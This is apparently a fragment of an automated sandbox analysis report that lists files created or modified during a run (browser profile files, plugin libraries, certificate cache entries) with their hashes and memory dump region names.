| SHA256 | 1466cf8fb7e00388773e99781452c2f38cfe55b37150f1085a549977ff5eda0d |
| SHA512 | 7b451ee5b97326544c12a24bb887a2d1b802fbffacf1e0e6e800cb619b761da3ed46d64d64394f9f9e85717ce9f9ae59001f9b2f53ab4fa3a8b815890210be2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3230e22ce6a7f801a675fc2192ce7f4f |
| SHA1 | 2c38ddd2422bcfc2f8a7a015370f9a6066f40409 |
| SHA256 | dfcbf00413990164ce771a84af88d84e43ccd1a31ad181bb98a571e95b9177b4 |
| SHA512 | 041c5dc70669b888c336c35134983cba228a743845f686b94d33a4f4ddeee4786717904baec98d7e77c720ec2e818e26a86c31f1bc6dfc46341750eb91f55ad8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1e041e35fc39005959c1b0734fc4f9b6 |
| SHA1 | de075c6d0fb71bd4a3e080d1a09066923b3c8e84 |
| SHA256 | 90cd0cc829535dae58bf5150c0c09aff9de3957d8486162719c2fda5214e5e1d |
| SHA512 | 258b23e5950203129024c4080af930871794607b9e3a463f2c38887219048661126284e17273e41816463d419c8839f62baea5b47df2f8534f96741d1abed892 |
memory/5996-1320-0x0000000000CE0000-0x0000000000CF0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 0d70806336f0d94a3faee385465014b5 |
| SHA1 | 583d1c75d36498a288fe12e72358d6c5dca51637 |
| SHA256 | 7c93b9374dedffbed3bfe8140ada26635ee3b215fc17371b5a0c7078f51c9de8 |
| SHA512 | 4f30d0160e74d296dcfeeb1bee606e9d062a1edf67285ba94efdfed6f7ebc2ea3c98f686a569fe71f26e0bd2dbdb4a6f1eefa6bef94d2bd375c7d17a392d4a97 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649
| MD5 | 0e4e4e077a1d8450ef908d9c8512d8eb |
| SHA1 | 8dfd99d32aed25d8f4c7783bce4272e25311d530 |
| SHA256 | cf3507de92e808feb4ded40e792f23ea9a003e911c19c877a61d19fcfea35f35 |
| SHA512 | aad87629dfcacc06eb8d7ecf3eb89bba2591fdf653fa7f2617ecfa7d5d75a05b736b05a2db6c52fec418b23a6f09b719443751f47d3c38e0a74c65ca58cf04ab |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 6870bd74420e8b401365822281f80594 |
| SHA1 | 47d99a4cac4e479c0ae79e8b17f4f1d6cbef67ab |
| SHA256 | c305a29163e05fe4a5f919dedad94ab9408b8bc2815b6a9859ced4db7f1871a6 |
| SHA512 | 247179bc0e227b913a070bb4b73414ef799d89dc9b377611ff9cb649daf6cdf5874341f6993345ac94fea08063aae160f9a3eafc645a9a612e03c96e1e4a295c |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 9b2e662ce25536075ab312ebed5902f4 |
| SHA1 | c8dfe5275b990aeda762b651085727d4e39aaefd |
| SHA256 | 6b3c58d3bb9db815a3652373a821b14326c49e2322b0924998b9c6ee3cf011d3 |
| SHA512 | 3be341a88c9ff1719fc1865e5ecf3f95e7a279c84be3e1d1c552220f6bd84cf1d0529ebf9f1b15b2f851f0c87d2f8770c683018ee51f2ae3ed445b5d92c843c9 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 5d4df79d3cca04f799aac29362187583 |
| SHA1 | 6312922a1bb17770b0036541b4d78e38ec972f29 |
| SHA256 | 647c94d5b8ce3fb55bbca4149b6f4a6858178146ce3cbadae7d6799988597d1b |
| SHA512 | 3db4260cc39ff89368eb4814bfac62efa09b93858d938543a8a561f0b5750753748632f22829226bc5c96ebb711541458e72c2b1099de6ed8610f522adc595f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 1b70f9c88d6eb3dc6688661966bbfbe4 |
| SHA1 | 1b6e5c2f100fce957df6d32272e292bdc472dcc0 |
| SHA256 | b0c6833ac9cf7f40cef2736b434e2627fe7f0b0b29bc6a3b9c8bb20514e19411 |
| SHA512 | 39e032c60accec5c72a72ecd3e877ea1bf5f96450a57b54fc5fb1978c321f31382ce836bb1106bfef2232655ab8e8b90206f466538a87a457e86eeb0f60a2321 |
memory/372-3369-0x0000000000BC0000-0x0000000000BF8000-memory.dmp
memory/4156-3380-0x00000000009D0000-0x0000000000A06000-memory.dmp
memory/572-3393-0x00000000008E0000-0x00000000008F0000-memory.dmp